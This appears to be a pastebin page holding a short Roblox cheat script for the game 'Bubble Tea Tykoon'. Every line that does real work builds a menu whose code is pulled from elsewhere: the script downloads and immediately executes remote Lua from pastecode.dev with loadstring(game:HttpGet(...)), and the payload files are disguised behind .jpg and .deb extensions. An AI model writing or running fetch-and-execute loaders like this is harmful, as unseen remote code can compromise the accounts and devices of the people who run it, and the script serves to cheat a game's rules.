R

bubbletea uwu

public
rrixh Apr 12, 2024 Never 41
Clone
Plaintext bubbletea 6 lines (6 loc) | 406 Bytes
1
local Library = loadstring(game:HttpGet("https://pastecode.dev/raw/o579xt86/mobileWally.jpg",true))()
2
local uwu = Library:CreateWindow("🥤Bubble Tea Tykoon🥤")
3
uwu:AddButton({text = "Get Bubble Tea", callback = function() loadstring(game:HttpGet("https://pastecode.dev/raw/dq3lkfes/instantBubbleTea.THANKSTORA_lulaslollipop.deb",true))()
4
end})
5
uwu:AddFolder("by lulaslollipop🍭")
6
Library:Init()